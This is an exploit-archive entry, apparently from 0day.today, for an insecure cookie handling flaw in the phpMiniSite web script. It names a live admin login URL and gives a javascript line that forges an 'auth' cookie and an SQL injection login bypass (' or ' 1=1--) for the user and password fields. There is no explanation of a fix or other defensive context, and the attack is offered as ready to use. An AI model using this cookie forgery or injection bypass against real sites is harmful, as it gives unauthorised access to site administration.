id: 10827
date: 02/10/2010
title: phpMiniSite Insecure cookie handling vulnerability
author: JiKo
cves: 

==================================================
phpMiniSite Insecure cookie handling vulnerability
==================================================

[~]-----------|01|
    -{Script}
    name :phpMiniSite
    link :http://ezonescripts.com/productdemos/phpMiniSite/admin/login.php

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="auth=fook; path=/";
    User :' or ' 1=1--
    Pass :' or ' 1=1--



#  0day.today [2023-03-24]  #